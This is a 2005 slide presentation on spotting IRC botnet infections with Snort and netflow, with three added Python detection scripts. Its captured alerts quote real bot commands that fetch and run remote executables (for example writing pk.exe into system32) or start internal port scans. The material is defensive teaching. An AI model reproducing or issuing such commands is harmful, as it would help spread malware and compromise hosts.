8/6/2019 Spot the Bot
1/36
Spot the Bot:
IRC Bot Detection and
Remediation
Karl F. Lutzen
Systems Security Analyst, UMR Information Systems Security
Agenda
Bot Basics
Detection Methods
Remediation
Risk Mitigation
Summary
Bots/Zombies/Drones
Call them anything you want, but they all describe the same thing: Trouble
Botnets Today:
Fun
Malicious intent
Profitable
Dutch Botnet Bigger Than Expected
http://www.governmententerprise.com/news/172303265
October 21, 2005
Dutch prosecutors who last month arrested a trio of young men for creating a large botnet allegedly used to extort a U.S. company, steal identities, and distribute spyware now say they bagged bigger prey: a botnet of 1.5 million machines.
The three suspects, ages 19, 22, and 27, were arrested Oct. 6 on charges of threatening a U.S. firm with a denial-of-service (DoS) attack after Amsterdam-based Internet service provider XS4ALL notified authorities of unusual activity on its network.
Bots and Botnets - 1
A Bot is a remote control program loaded onto unsuspecting hosts for various purposes, usually malicious.
The Bot owner has full control of what he/she wishes to upload onto the compromised system and what it can do.
A group of Bots under a single owner (bot herder) is a Botnet (bot herd).
Bots and Botnets 2
Bots are spread as malicious payloads using any number of attack vectors:
Worms
Email viruses
Phishing
Infected files on fileshares/P2P
Direct attack of vulnerabilities
Enticement via Web/Instant Messages ("This is cool! Click Me")
Bots and Botnets - 3
Bots are usually controlled via IRC by blackhats/interested parties of all ages.
The Botnet owner simply sends commands to the IRC channel and the Bots do what they are told.
Bots circumvent firewalls and network address translators because the infected host initiates the outbound connection to the control channel; nothing has to be allowed inbound.
Bots and Botnets 4
Botnets can steal: personal or business information, software license keys, etc.
Botnets can launch any number of attacks: DoS, DDoS, send spam, launch worms, spread pop-up ads.
Anything the Bot owner chooses to do, the botted systems will dutifully carry out.
Bot Fighting on Slashdot
Microsoft's Vigilante Investigation of Zombies
Posted by Zonk on Friday October 28, @03:55PM from the busting-undead-skull dept.
Morgalyn writes "According to an article at InformationWeek, Microsoft has decided to fight zombie-launched spam in their own way. In conjunction with the FTC and consumer rights groups, Microsoft set up a clean computer and then infected it. They monitored the 'zombie' over the course of 20 days - 'In those 20 days, this one computer received 5 million connection requests from spammers, and sent 18 million spam messages'. This whole operation has led to the (partial) identification of 13 different spamming groups, some of which reside in the US and may be prosecuted under the CAN-SPAM act."
Bot Detection Setup
Policies first!
Install network statistics monitoring:
Netflow
Sflow
Firewall w/logging
Others
IDS sensors such as Snort
Network Statistics
Determine unusual traffic patterns
Find out all systems talking to a specific host
Verify whether firewall rules are working or not
Downside:
Hard to read
Generates a huge amount of data
Only reactive
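The "find out all systems talking to a specific host" use of flow data, worked as an added example that is not part of the deck or UMR's tooling: a Python script that groups constructed flow records by external destination and port and lists the internal hosts behind each pair, so a cluster of hosts all reaching one non-business port on one server stands out the way the deck's "group of infected hosts talking to a single server" does. The CSV shape, the 131.151.0.0/16 internal range (matching the redacted 131.151.xxx.yyy alerts later in the deck), the BUSINESS_PORTS list and the threshold are all assumptions; the external addresses are documentation ranges.

```python
import csv
import io
import ipaddress
from collections import defaultdict

# Constructed flow records (assumed CSV shape, not a real NetFlow/sFlow export):
# src, dst, dport, bytes. 131.151.0.0/16 is treated as the internal range, matching the
# redacted 131.151.xxx.yyy alerts in this deck; external addresses are documentation ranges.
SAMPLE_FLOWS = """\
src,dst,dport,bytes
131.151.10.5,203.0.113.7,3994,1420
131.151.10.17,203.0.113.7,3994,980
131.151.22.8,203.0.113.7,3994,1310
131.151.10.5,203.0.113.7,3994,220
131.151.31.2,203.0.113.7,3994,760
131.151.10.5,198.51.100.20,443,52000
131.151.10.17,198.51.100.20,443,48000
131.151.22.8,198.51.100.53,53,120
131.151.44.1,203.0.113.9,8080,600
131.151.10.5,131.151.2.2,445,30000
"""

INTERNAL = ipaddress.ip_network("131.151.0.0/16")
# Assumed list of ports the business expects to see outbound; tune to the local policy.
BUSINESS_PORTS = {22, 25, 53, 80, 443}


def talkers_per_server(flows_csv):
    """Map each external (dst, dport) pair to the set of internal hosts that contacted it.
    Internal-to-internal flows are ignored; the interest here is egress traffic."""
    peers = defaultdict(set)
    for row in csv.DictReader(io.StringIO(flows_csv)):
        src = ipaddress.ip_address(row["src"])
        dst = ipaddress.ip_address(row["dst"])
        if src in INTERNAL and dst not in INTERNAL:
            peers[(str(dst), int(row["dport"]))].add(str(src))
    return peers


def suspect_servers(flows_csv, min_hosts=3):
    """External servers on non-business ports contacted by at least min_hosts distinct
    internal hosts, most-contacted first. Each hit is (dst, dport, sorted internal hosts):
    a cluster of internal hosts all reaching one odd port on one server is the
    'group of infected hosts talking to a single server' pattern the deck describes."""
    hits = [
        (dst, dport, sorted(hosts))
        for (dst, dport), hosts in talkers_per_server(flows_csv).items()
        if dport not in BUSINESS_PORTS and len(hosts) >= min_hosts
    ]
    return sorted(hits, key=lambda hit: -len(hit[2]))


if __name__ == "__main__":
    for dst, dport, hosts in suspect_servers(SAMPLE_FLOWS):
        print(f"{dst}:{dport} contacted by {len(hosts)} internal hosts: {', '.join(hosts)}")
```

With the sample data only 203.0.113.7:3994 clears the default threshold; lowering `min_hosts` to 1 also surfaces the single host on 203.0.113.9:8080, which shows why the threshold matters on a real export where one-off connections to odd ports are common.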
IDS with Snort
Open source software
Runs on Linux, Windows and OSX
Thousands of detection rules available
Can be coupled with iptables for instant quarantine
Database alert management
Graphic consoles available
Should be located at your egress point(s)
http://www.snort.org/
Rule Sets
Select only a specific group of bot rules
Also get the Bleeding Edge Snort rules
http://www.bleeding-snort.org/
Don't get carried away!
Rules To Choose
Get the rules that detect IRC commands on both standard and non-standard IRC ports:
NICK
JOIN
PRIVMSG
Use both the standard Snort and Bleeding Snort rules that cover these commands.
UMR does not use any custom rules to detect bots, as these basic rules really do the job.
Spot the Bot - Unusual Names
NICK or USER names:
USA|08039035
x445004
XP-7546411
[o]619531707
[urx]47517
wxkrihazqydm
[worm3]8454428
[XkzQ]-31244
The key here is that unique names are required in an IRC channel, thus bots use random names.
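An added example, not code from the deck: Python heuristics that score the name shapes listed above (a long digit run, a tag-plus-counter such as `[worm3]8454428` or `USA|08039035`, and an unpronounceable consonant run such as `wxkrihazqydm`) and apply them to the NICK/USER parameter of IRC client lines like the ones the Snort rules fire on. The sample lines, the reason codes and the thresholds are my assumptions; the "consonant run" test is one way to capture "random names", and the right cutoff is whatever your own baseline of legitimate nicks tolerates.

```python
import re

# Shapes of the bot names shown above: a long digit run (random number or counter),
# a tag-plus-counter such as [worm3]8454428 or USA|08039035, or an unpronounceable
# consonant run such as wxkrihazqydm. Thresholds are assumptions; tune them against
# a baseline of the legitimate IRC names seen on your own network.
DIGIT_RUN = re.compile(r"\d{5,}")
TAG_COUNTER = re.compile(r"^(\[[^\]]+\]|[A-Za-z]+\|)-?\d+$")
MIN_CONSONANT_RUN = 4
VOWELS = set("aeiouy")

# Constructed client lines of the kind the NICK/USER Snort rules fire on; the first
# four names come from the deck's samples, the rest are assumed-benign users.
SAMPLE_LINES = [
    "NICK [XkzQ]-31244",
    "NICK [worm3]8454428",
    "USER uxqiktmf 0 0 :[worm3]8454428",
    "NICK USA|08039035",
    "NICK karl",
    "NICK bob42",
    "JOIN #security",
]


def longest_consonant_run(name):
    """Length of the longest run of consonant letters; digits and symbols end a run."""
    longest = run = 0
    for ch in name:
        if ch.isalpha() and ch.lower() not in VOWELS:
            run += 1
            longest = max(longest, run)
        else:
            run = 0
    return longest


def nick_reasons(name):
    """Reason codes explaining why a NICK/USER name looks machine-generated (empty if none)."""
    reasons = []
    if DIGIT_RUN.search(name):
        reasons.append("digit-run")
    if TAG_COUNTER.match(name):
        reasons.append("tag-counter")
    if longest_consonant_run(name) >= MIN_CONSONANT_RUN:
        reasons.append("consonant-run")
    return reasons


def parse_irc_line(line):
    """Split one IRC line into (COMMAND, params). Parameters are space separated; a
    final parameter introduced by ' :' may itself contain spaces (RFC 1459 framing)."""
    line = line.rstrip("\r\n")
    if line.startswith(":"):  # server-side prefix ':nick!user@host'; clients do not send it
        _, _, line = line.partition(" ")
    head, _, trailing = line.partition(" :")
    params = head.split()
    if trailing:
        params.append(trailing)
    if not params:
        return "", []
    return params[0].upper(), params[1:]


def scan_irc_lines(lines):
    """Return (command, name, reasons) for each NICK or USER whose name trips a heuristic."""
    hits = []
    for line in lines:
        cmd, params = parse_irc_line(line)
        if cmd in ("NICK", "USER") and params:
            reasons = nick_reasons(params[0])
            if reasons:
                hits.append((cmd, params[0], reasons))
    return hits


if __name__ == "__main__":
    for cmd, name, reasons in scan_irc_lines(SAMPLE_LINES):
        print(f"{cmd} {name}: {', '.join(reasons)}")
```

The USER line is worth keeping in the sample: the deck's second Nick-change alert carries a username (`uxqiktmf`) that is just as random as the nick, so scoring the first USER parameter catches bots whose nick alone would pass.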
Unusual Name Sample 1
#(6 - 1326751) [2005-02-15 15:52:34] [snort/3856] BLEEDING-EDGE IRC - Nickchange on non-std port
IPv4: 131.151.xxx.yyy -> 69.31.76.179
hlen=5 TOS=32 dlen=58 ID=30 flags=0 offset=0 TTL=128 chksum=23670
TCP: port=1032 -> dport: 3994 flags=***AP*** seq=3157605320
ack=2395385288 off=5 res=0 win=8704 urp=0 chksum=11320
Payload: length = 18
000 : 4E 49 43 4B 20 5B 58 6B 7A 51 5D 2D 33 31 32 34 NICK [XkzQ]-3124
010 : 34 0A 4.
Unusual Name Sample 2
#(6 - 1885480) [2005-03-06 17:51:24] [snort/2000345] BLEEDING-EDGE IRC - Nick change on non-std port
IPv4: 131.151.xxx.yyy -> 134.36.198.28
hlen=5 TOS=32 dlen=96 ID=36715 flags=0 offset=0 TTL=128 chksum=5416
TCP: port=3938 -> dport: 8080 flags=***AP*** seq=4008201724 ack=92744897 off=5 res=0 win=64240 urp=0 chksum=2747
Payload: length = 56
000 : 4E 49 43 4B 20 5B 77 6F 72 6D 33 5D 38 34 35 34 NICK [worm3]8454
010 : 34 32 38 0D 0A 55 53 45 52 20 75 78 71 69 6B 74 428..USER uxqikt
020 : 6D 66 20 30 20 30 20 3A 5B 77 6F 72 6D 33 5D 38 mf 0 0 :[worm3]8
030 : 34 35 34 34 32 38 0D 0A 454428..
Spot the Bot - Channel Names
Look for odd JOIN commands:
#ev1ls x
#worm3
#M0b3l1
#a,#b,#c
#port1 llck
#x# lmao
#.a
#.dr0nz
Channel names are a little tricky, as normal names can be very similar. Recommend using IRC to get a baseline.
Channel Names
#(14 - 1584355) [2005-10-25 00:00:34] [snort/2000348] BLEEDING-EDGE ATTACK RESPONSE IRC - Channel JOIN on non-std port
IPv4: 131.151.xxx.yyy -> 69.64.51.161
hlen=5 TOS=0 dlen=54 ID=28371 flags=0 offset=0 TTL=128 chksum=55367
TCP: port=4321 -> dport: 1231 flags=***AP*** seq=2096338814
ack=2490835872 off=5 res=0 win=17116 urp=0 chksum=49459
Payload: length = 14
000 : 4A 4F 49 4E 20 23 45 76 31 6C 73 20 78 0A JOIN #Ev1ls x.
Channel Names
#(6 - 5795325) [2005-05-12 00:41:08] [snort/2000348] BLEEDING-EDGE IRC - Channel JOIN on non-std port
IPv4: 131.151.xxx.yyy -> 220.85.13.93
hlen=5 TOS=0 dlen=55 ID=17572 flags=0 offset=0 TTL=127 chksum=47920
TCP: port=2993 -> dport: 4367 flags=***AP*** seq=1143137794
ack=1716133218 off=5 res=0 win=17392 urp=0 chksum=29328
Payload: length = 15
000 : 4A 4F 49 4E 20 23 78 23 20 6C 6D 61 6F 0D 0A JOIN #x# lmao..
Spot the Bot - PRIVMSG
Download instructions
Scanning instructions
Exploited host information
Personal information (license keys)
Warning: private messages contain private conversations, downloads, etc. Use with extreme caution.
Spot the Bot - PRIVMSG
#(6 - 1885569) [2005-03-06 17:52:35] [snort/2000347] BLEEDING-EDGE IRC - Private message on non-std port
IPv4: 131.151.xxx.yyy -> 193.10.218.172
hlen=5 TOS=32 dlen=156 ID=35717 flags=0 offset=0 TTL=128 chksum=51933
TCP: port=2123 -> dport: 8080 flags=***AP*** seq=1876389772
ack=2284567773 off=5 res=0 win=64885 urp=0 chksum=48995
Payload: length = 116
000 : 50 52 49 56 4D 53 47 20 23 6C 6C 20 3A 5B 44 4F PRIVMSG #ll :[DO
010 : 57 4E 4C 4F 41 44 5D 3A 20 44 6F 77 6E 6C 6F 61 WNLOAD]: Downloa
020 : 64 69 6E 67 20 55 52 4C 3A 20 68 74 74 70 3A 2F ding URL: http:/
030 : 2F 77 77 77 2E 61 6E 67 65 6C 66 69 72 65 2E 63 /www.angelfire.c
040 : 6F 6D 2F 77 61 33 2F 6C 6F 6C 61 2F 6D 77 2E 72 om/wa3/lola/mw.r
050 : 61 72 20 74 6F 3A 20 63 3A 5C 77 69 6E 64 6F 77 ar to: c:\window
060 : 73 5C 73 79 73 74 65 6D 33 32 5C 70 6B 2E 65 78 s\system32\pk.ex
070 : 65 2E 0D 0A e...
PRIVMSG Scan Report
#(6 - 4695420) [2005-05-01 15:52:18] [snort/1] Tagged Packet
IPv4: 131.151.xxx.yyy -> 205.244.47.221
hlen=5 TOS=0 dlen=168 ID=64 flags=0 offset=0 TTL=128 chksum=50198
TCP: port=1032 -> dport: 57383 flags=***AP*** seq=631391448
ack=2791198005 off=5 res=0 win=17073 urp=0 chksum=29858
Payload: length = 128
000 : 50 52 49 56 4D 53 47 20 23 6F 20 3A 5B 53 43 41 PRIVMSG #o :[SCA
010 : 4E 5D 3A 20 53 65 71 75 65 6E 74 69 61 6C 20 50 N]: Sequential P
020 : 6F 72 74 20 53 63 61 6E 20 73 74 61 72 74 65 64 ort Scan started
030 : 20 6F 6E 20 31 33 31 2E 31 35 31 2E 30 2E 30 3A on 131.151.0.0:
040 : 31 33 39 20 77 69 74 68 20 61 20 64 65 6C 61 79 139 with a delay
050 : 20 6F 66 20 34 20 73 65 63 6F 6E 64 73 20 66 6F  of 4 seconds fo
060 : 72 20 30 20 6D 69 6E 75 74 65 73 20 75 73 69 6E r 0 minutes usin
070 : 67 20 32 30 30 20 74 68 72 65 61 64 73 2E 0D 0A g 200 threads...
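The PRIVMSG samples above are where the incident-response value is: the bot reports what it downloaded, where it wrote it, and what it is scanning. As an added example that is not part of the deck, here is a Python parser that rebuilds the raw payload from Snort's hex-dump layout (using the `Payload: length = N` line as the byte count so that ASCII text on the right can never be mistaken for data) and then pulls the report tag, channel, URLs, Windows paths and IP:port targets out of every PRIVMSG for an incident ticket. The alert text is copied from the [DOWNLOAD] sample above; the regexes, the output keys and the `extract_indicators` helper are my assumptions.

```python
import re

# Constructed input: a Snort alert in the hex-dump layout the slides show, copied from the
# [DOWNLOAD] PRIVMSG sample above. Only the "Payload: length" line and the hex columns
# are consumed; the ASCII column on the right is ignored.
SAMPLE_ALERT = r"""
#(6 - 1885569) [2005-03-06 17:52:35] [snort/2000347] BLEEDING-EDGE IRC - Private message on non-std port
IPv4: 131.151.xxx.yyy -> 193.10.218.172
hlen=5 TOS=32 dlen=156 ID=35717 flags=0 offset=0 TTL=128 chksum=51933
TCP: port=2123 -> dport: 8080 flags=***AP*** seq=1876389772
ack=2284567773 off=5 res=0 win=64885 urp=0 chksum=48995
Payload: length = 116
000 : 50 52 49 56 4D 53 47 20 23 6C 6C 20 3A 5B 44 4F PRIVMSG #ll :[DO
010 : 57 4E 4C 4F 41 44 5D 3A 20 44 6F 77 6E 6C 6F 61 WNLOAD]: Downloa
020 : 64 69 6E 67 20 55 52 4C 3A 20 68 74 74 70 3A 2F ding URL: http:/
030 : 2F 77 77 77 2E 61 6E 67 65 6C 66 69 72 65 2E 63 /www.angelfire.c
040 : 6F 6D 2F 77 61 33 2F 6C 6F 6C 61 2F 6D 77 2E 72 om/wa3/lola/mw.r
050 : 61 72 20 74 6F 3A 20 63 3A 5C 77 69 6E 64 6F 77 ar to: c:\window
060 : 73 5C 73 79 73 74 65 6D 33 32 5C 70 6B 2E 65 78 s\system32\pk.ex
070 : 65 2E 0D 0A e...
"""

LENGTH_RE = re.compile(r"Payload:\s*length\s*=\s*(\d+)")
DUMP_ROW_RE = re.compile(r"^\s*[0-9A-Fa-f]{3,}\s*:\s*(.*)$")   # "000 : 50 52 ..."
HEX_BYTE_RE = re.compile(r"^[0-9A-Fa-f]{2}$")
PRIVMSG_RE = re.compile(r"^PRIVMSG\s+(\S+)\s+:(.*)$")
TAG_RE = re.compile(r"^\[([A-Za-z]+)\]")                        # [DOWNLOAD], [SCAN], ...
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
WINPATH_RE = re.compile(r"[A-Za-z]:\\[^\s\"'<>]+")
IPPORT_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?\b")


def payload_bytes(alert_text):
    """Rebuild the raw payload from a Snort hex dump. Each row carries at most 16 bytes and
    the declared payload length caps how many tokens are consumed, so the ASCII column is
    never read as data even when it happens to look like a hex pair."""
    m = LENGTH_RE.search(alert_text)
    if not m:
        raise ValueError("no 'Payload: length = N' line in alert")
    remaining = int(m.group(1))
    out = bytearray()
    for line in alert_text.splitlines():
        row = DUMP_ROW_RE.match(line)
        if not row or remaining == 0:
            continue
        take = min(16, remaining)
        tokens = row.group(1).split()[:take]
        if len(tokens) < take or not all(HEX_BYTE_RE.match(t) for t in tokens):
            raise ValueError(f"malformed dump row: {line!r}")
        out.extend(int(t, 16) for t in tokens)
        remaining -= take
    if remaining:
        raise ValueError(f"dump ended {remaining} bytes short of the declared length")
    return bytes(out)


def irc_messages(payload):
    """Split a payload into IRC lines (CRLF or bare LF terminated), dropping empties."""
    text = payload.decode("latin-1")
    return [ln for ln in text.replace("\r\n", "\n").split("\n") if ln]


def extract_indicators(channel, text):
    """Indicators from one PRIVMSG body: report tag, URLs, Windows paths, IP:port targets.
    A trailing '.' is stripped because the bots end their reports like sentences."""
    tag = TAG_RE.match(text)
    return {
        "channel": channel,
        "tag": tag.group(1) if tag else None,
        "urls": [u.rstrip(".") for u in URL_RE.findall(text)],
        "paths": [p.rstrip(".") for p in WINPATH_RE.findall(text)],
        "targets": IPPORT_RE.findall(text),
    }


def privmsg_indicators(alert_text):
    """Indicators for every PRIVMSG found in the alert's reconstructed payload."""
    findings = []
    for line in irc_messages(payload_bytes(alert_text)):
        m = PRIVMSG_RE.match(line)
        if m:
            findings.append(extract_indicators(*m.groups()))
    return findings


if __name__ == "__main__":
    for finding in privmsg_indicators(SAMPLE_ALERT):
        print(finding)
```

`extract_indicators` is separate from the dump parsing so it can be run on the [SCAN] report text as well: for "Sequential Port Scan started on 131.151.0.0:139 ..." it returns the tag `SCAN` and the target `131.151.0.0:139`, which is exactly the internal range the bot was told to scan.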
Tagged Packets
Part of the instructions within a Snort rule will generate what are called Tagged Packets. They do not match the full inspection for the purpose of the rule, but they contain significant information. Turning them off is possible, but they are very useful.
User MODE: Invisible
#(14 - 1584280) [2005-10-25 00:00:27] [snort/1] Tagged Packet
IPv4: 131.151.xxx.yyy -> 69.64.51.161
hlen=5 TOS=0 dlen=83 ID=27977 flags=0 offset=0 TTL=128 chksum=55732
TCP: port=4321 -> dport: 1231 flags=***AP*** seq=2096338771
ack=2490835835 off=5 res=0 win=17153 urp=0 chksum=39888
Payload: length = 43
000 : 4D 4F 44 45 20 5B 58 50 2D 37 35 34 36 34 31 31 MODE [XP-7546411
010 : 5D 20 2B 69 78 0A 4D 4F 44 45 20 5B 58 50 2D 37 ] +ix.MODE [XP-7
020 : 35 34 36 34 31 31 5D 20 2B 69 0A 546411] +i.
Tagged Packet Other Data
#(6 - 4404904) [2005-09-27 08:15:52] [snort/1] Tagged Packet
IPv4: 69.50.230.207 -> 131.151.xxx.yyy
hlen=5 TOS=0 dlen=133 ID=6397 flags=0 offset=0 TTL=46 chksum=63130
TCP: port=8080 -> dport: 1142 flags=***AP*** seq=536906448
ack=4216320730 off=5 res=0 win=6432 urp=0 chksum=61441
Payload: length = 93
000 : 3A 71 21 66 64 67 64 66 67 40 68 65 6C 6C 6F 2E :q!fdgdfg@hello.
010 : 6E 65 74 20 54 4F 50 49 43 20 23 77 6F 6F 74 20 net TOPIC #woot
020 : 3A 2E 64 6C 20 68 74 74 70 3A 2F 2F 68 6F 6D 65 :.dl http://home
030 : 70 61 67 65 2E 6E 74 6C 77 6F 72 6C 64 2E 63 6F page.ntlworld.co
040 : 6D 2F 74 72 61 63 65 79 33 32 2F 61 2E 65 78 65 m/tracey32/a.exe
050 : 20 61 2E 65 78 65 20 31 20 2D 73 0D 0A a.exe 1 -s..
Tagged Packet Other Data
#(6 - 5795327) [2005-05-12 00:41:08] [snort/1] Tagged Packet
IPv4: 220.85.13.93 -> 131.151.xxx.yyy
hlen=5 TOS=0 dlen=253 ID=21842 flags=0 offset=0 TTL=44 chksum=64700
TCP: port=4367 -> dport: 2993 flags=***AP*** seq=1716133218
ack=1143137809 off=5 res=0 win=5749 urp=0 chksum=22567
Payload: length = 213
000 : 3A 73 64 79 79 78 63 6B 67 64 66 6D 21 7E 73 64 :sdyyxckgdfm!~sd
010 : 79 79 78 63 6B 67 64 40 31 33 31 2E 31 35 31 2E yyxckgd@131.151.
020 : xx xx xx 2E xx xx xx 20 4A 4F 49 4E 20 3A 23 78 xxx.yyy JOIN :#x
030 : 23 0D 0A 3A 53 53 48 20 33 33 32 20 73 64 79 79 #..:SSH 332 sdyy
040 : 78 63 6B 67 64 66 6D 20 23 78 23 20 3A 2E 61 69 xckgdfm #x# :.ai
050 : 6D 73 70 72 65 61 64 20 68 74 74 70 3A 2F 2F 76 mspread http://v
060 : 6F 69 70 73 74 6F 72 65 2E 6E 65 74 2F 6D 79 70 oipstore.net/myp
070 : 69 63 2E 63 6F 6D 0D 0A 3A 53 53 48 20 33 33 33 ic.com..:SSH 333
080 : 20 73 64 79 79 78 63 6B 67 64 66 6D 20 23 78 23 sdyyxckgdfm #x#
090 : 20 31 30 3A 33 30 20 50 4D 20 31 31 31 35 38 37 10:30 PM 111587
0a0 : 39 36 38 35 0D 0A 3A 53 53 48 20 33 36 36 20 73 9685..:SSH 366 s
0b0 : 64 79 79 78 63 6B 67 64 66 6D 20 23 78 23 20 3A dyyxckgdfm #x# :
0c0 : 45 6E 64 20 6F 66 20 2F 4E 41 4D 45 53 20 6C 69 End of /NAMES li
0d0 : 73 74 2E 0D 0A st...
That's All There Is To It!
You now have the basics to detect all bots.
If you discover a group of infected hosts talking to a single server, be sure to report it to:
Sharing information is the best way to combat bots.
Feds Bust Suspected Bot Master
Federal authorities arrested a 20-year-old California man on Thursday, accusing him of creating bot software to compromise nearly 400,000 Windows computers and using his control of the systems to garner more than $60,000 in profits.
Over nearly a year, Ancheta allegedly used automated software to infect Windows systems, advertised and sold access to the compromised PCs, and used the software to perpetrate click fraud, garnering tens of thousands of dollars in affiliate fees, according to a 58-page indictment released on Thursday.
Security Focus, Nov 4, 2005
http://enterprisesecurity.symantec.com/content.cfm?articleid=6156
Remediation
Generally you will end up with some Administrator/SYSTEM level compromise.
Can be cleaned, but no guarantees; it is rare to return to a trusted state.
Possible rootkits
www.sysinternals.com has great tools for this.
Hidden files
The entire Internet is the domain for other installs.
Best Practice: Flatten/Rebuild
Risk Mitigation
Educate your users. Repeatedly.
Web browser security settings
Do not run as Admin
Install anti-virus software with auto updates
Keep systems patched
DON'T CLICK THAT LINK!
Block ports not needed for business
Proxy servers
Install network statistics monitoring like netflow
Install IDS sensors like Snort
Other Issues with Bots
Encryption
Modified IRC servers
Morphing tendencies:
Commands change
Exploits change, adapting to new vulnerabilities
Moving targets:
IRC servers change
Ports change
Summary
Bots will be with us for a very long time.
Best practices:
Educate users: patches/security settings/what not to do!
Install IDS and network statistics monitoring
Keep yourself up to date on the bots and tactics
Share your findings. Inform MOREnet: [email protected]
Further questions: [email protected]